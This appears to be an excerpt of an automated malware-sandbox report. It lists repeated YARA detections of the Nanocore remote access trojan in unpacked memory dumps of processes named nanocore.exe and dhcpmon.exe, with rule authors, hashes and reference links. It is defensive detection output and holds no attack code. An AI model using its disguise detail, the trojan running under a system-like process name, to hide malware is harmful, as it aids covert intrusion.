      Source: 13.2.dhcpmon.exe.245ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.252b8c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.252b8c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
